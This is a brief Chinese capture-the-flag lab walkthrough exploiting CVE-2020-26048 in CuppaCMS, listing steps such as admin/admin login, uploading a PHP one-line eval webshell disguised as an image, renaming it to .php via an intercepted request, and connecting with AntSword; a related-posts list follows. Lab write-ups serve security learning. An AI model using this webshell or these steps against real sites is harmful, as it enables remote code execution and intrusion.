春秋云境CVE-2020-26048

简介

CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。

正文

1.进入靶场

2.弱口令登录admin\admin

3.上传一句话木马图片

复制代码
<?php @eval($_POST['cmd']);?>

4.删除配置文件

5.重命名图片,抓包更改文件后缀

6.蚁剑连接

7.得到flag

相关推荐
mooyuan天天24 分钟前
Webug3.0通关笔记17 中级进阶(第01-05关)
web安全·文件包含·sql注入·webug靶场
vortex54 小时前
网络安全入门综述
安全·web安全·网络安全
智驱力人工智能5 小时前
夏季道路安全的AI革命:节省人力、提升效率
人工智能·安全·边缘计算·视觉算法·视觉分析·智能巡航·人工智能云计算
神经毒素8 小时前
WEB安全--社会工程--SET钓鱼网站
安全·web安全
琢磨先生David12 小时前
重构数字信任基石:Java 24 网络安全特性的全维度革新与未来防御体系构建
java·web安全·密码学
20242817李臻14 小时前
李臻20242817_安全文件传输系统项目报告_第9周
数据库·安全
智驱力人工智能15 小时前
无感通行与精准管控:AI单元楼安全方案的技术融合实践
人工智能·安全·智慧城市·智慧园区
见青..16 小时前
【学习笔记】文件包含漏洞--本地远程包含、伪协议、加密编码
前端·笔记·学习·web安全·文件包含
lally.18 小时前
2025蓝桥杯省赛网络安全组wp
web安全·蓝桥杯
CyberSecurity_zhang18 小时前
汽车网络安全 -- 理解暴露面、攻击面和攻击向量
网络安全·信息安全·汽车